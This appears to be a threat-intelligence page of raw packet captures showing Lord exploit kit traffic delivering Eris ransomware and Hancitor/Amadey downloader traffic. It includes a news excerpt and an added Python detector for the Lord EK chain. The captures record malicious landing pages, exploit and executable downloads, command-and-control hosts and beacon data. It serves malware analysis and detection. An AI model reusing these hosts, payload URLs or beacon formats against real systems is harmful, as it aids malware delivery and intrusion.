Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename="Server.exe";

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
E………..Q…

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{"uid":"d708005f8b8c91d1"}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{"response":"","code":0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin’s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it.

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability. One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs. Source: https://www.securityweek.com/new-lord-exploit-kit-emerges
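As an added example (not code from the original page or from the researchers it cites), the following Python pulls HTTP requests out of tcpdump -A text and flags the chain visible in the capture above: an ngrok.io landing page, a .swf request carrying an x-flash-version header, and an executable fetched from a bare IP:port by the wininet User-Agent. The SAMPLE text is constructed, trimmed from the page's own dump, with one constructed benign request added as a negative case.

```python
"""Added example (not the page's own code): parse tcpdump -A text into HTTP
requests and flag the Lord EK chain. SAMPLE is constructed from the page."""
import re
from dataclasses import dataclass, field

PACKET_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP (\S+) > (\S+): ")
# tcpdump -A glues the ASCII payload onto its dotted rendering of the IP/TCP
# header bytes, so the request line is recognised by its tail, not its start.
REQUEST_RE = re.compile(r"(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
IP_PORT_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


@dataclass
class HttpRequest:
    ts: str
    src: str                      # client ip.port as tcpdump prints it
    dst: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_requests(text):
    """Return the HTTP requests in tcpdump -A output, in capture order."""
    requests, ts, src, dst, current = [], None, None, None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        pm = PACKET_RE.match(line)
        if pm:                            # packet header: reset state
            ts, src, dst = pm.groups()
            current = None
            continue
        if current is None:               # still looking for a request line
            rm = REQUEST_RE.search(line)
            if rm and src:
                current = HttpRequest(ts, src, dst, rm.group(1), rm.group(2))
                requests.append(current)
            continue
        if not line:                      # blank line closes the header block
            current = None
            continue
        name, sep, value = line.partition(":")
        if sep:
            current.headers[name.strip().lower()] = value.strip()
    return requests


def classify(requests):
    """Tag requests with indicators taken from the page's traffic."""
    tags = []
    for r in requests:
        host = r.headers.get("host", "")
        if host.endswith(".ngrok.io"):
            swf = "x-flash-version" in r.headers or r.path.lower().endswith(".swf")
            tags.append(("lord_ek_swf_fetch" if swf else "lord_ek_landing", r))
        elif (IP_PORT_RE.match(host)
              and r.headers.get("user-agent", "").lower() == "wininet"
              and r.path.lower().endswith(".exe")):
            tags.append(("wininet_exe_from_bare_ip", r))
    return tags


def lord_ek_chains(requests):
    """Clients showing landing -> swf -> exe in that order (the full chain)."""
    order = ["lord_ek_landing", "lord_ek_swf_fetch", "wininet_exe_from_bare_ip"]
    seen = {}
    for tag, r in classify(requests):
        seen.setdefault(r.src.rsplit(".", 1)[0], []).append(tag)  # drop port
    confirmed = []
    for client, tags in seen.items():
        idx = [tags.index(t) for t in order if t in tags]
        if len(idx) == len(order) and idx == sorted(idx):
            confirmed.append(client)
    return confirmed


# Constructed sample: the page's three Lord EK requests plus a benign request.
SAMPLE = """\
2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@.....
..e.......PM....Hg.P.......GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Host: 57189bbb.ngrok.io

2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
..e.......PM....H.tP...OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
x-flash-version: 28,0,0,161
Host: 57189bbb.ngrok.io

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
..eQ..........`.2."P....+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567

2019-08-02 10:47:40.000000 IP 10.8.2.101.49190 > 10.8.2.1.80: Flags [P.], seq 1:60, ack 1, win 64240, length 59: HTTP: GET / HTTP/1.1
..e.......P.........GET / HTTP/1.1
Host: www.example.com
"""

if __name__ == "__main__":
    for tag, r in classify(parse_requests(SAMPLE)):
        print(f"{tag:26} {r.ts} {r.src} -> {r.headers.get('host')}{r.path}")
    print("full Lord EK chains:", lord_ek_chains(parse_requests(SAMPLE)))
```

The three rules fire individually on the first three requests and the benign request stays untagged; only a client that shows all three stages in order is reported as a full chain.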

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f……
..e
….x.5.&E…………..codeotso.com…..
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6…….

..e.5.x.6……………codeotso.com……………..S…
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@….[
..eS……Po0W3…… ..T…………..
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6……CS…
..e.P..rM..o0W4`………..
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@….e
..eS……Po0W4rM..P….T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E….j@….~
..eS……Po0W4rM..P…….POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6……FS…
..e.P..rM..o0X.P….n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6……ES…
..e.P..rM..o0X.P….x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6…….

..e.5…8..sJ………..fordifortti.ru……………..Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@…..
..eMxs….PQd…….. ……………..
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6…….

..e.5…;..LS………..material-nerud.ru……………..\5.
2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0
E..,6......}Mxs.
..e.P.. DrUQd..…^.…..
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…..
..eMxs….PQd..
DrVP…v…
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E….r@…..
..eMxs….PQd..
DrVP…….POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6…….Mxs.
..e.P..
DrVQd..P…u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@…..
..e\5....P.]2....... ..[..............
2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0
E..,6.....$.\5.
..e.P…..<.]2.....p......
2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0
E..(.t@....
..e\5….P.]2….=P…….
2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@…..
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6…..$.\5`.
..e.P…..=.]4.P…….
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…6…….Mxs.
..e.P..
DrVQd..P… C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@…..
..eMxs….PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6……|Mxs.
..e.P..
Ds.Qd..P…tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6…….\5`.
..e.P…..=.]4.P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: "5d39c1ad-49400"
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…P.o..6.i.P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$….w.^| 5
..e.P..6.i..o..P…8…
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%….w.^| 5
..e.P…Q..L…`………..
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n(
..e^| 5…PL….Q..P…….
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…PL….Q..P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&….w.^| 5
..e.P…Q..L..CP….5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8’……S…
..e.P….p..Y.RP…….
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@….A
..eS……P.Y.R..p.P..+….
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(….rI^| 5
..e.P..6.i..o..P…….HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@…..
..eMxs….P..7.`.?-P…b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86……Mxs.
..e.P..`.?-..8.P….V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E…..@….{
..e.,.!. .P[^b0.#.jP…+…GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8……..,.!
..e.P. .#.j[^b.P…s…
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8……;S…
..e.P.!ZB..+..Q`………..
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..eS….!.P+..QZB..P….F..
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@….c
..eS….!.P+..QZB..P…6V..POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
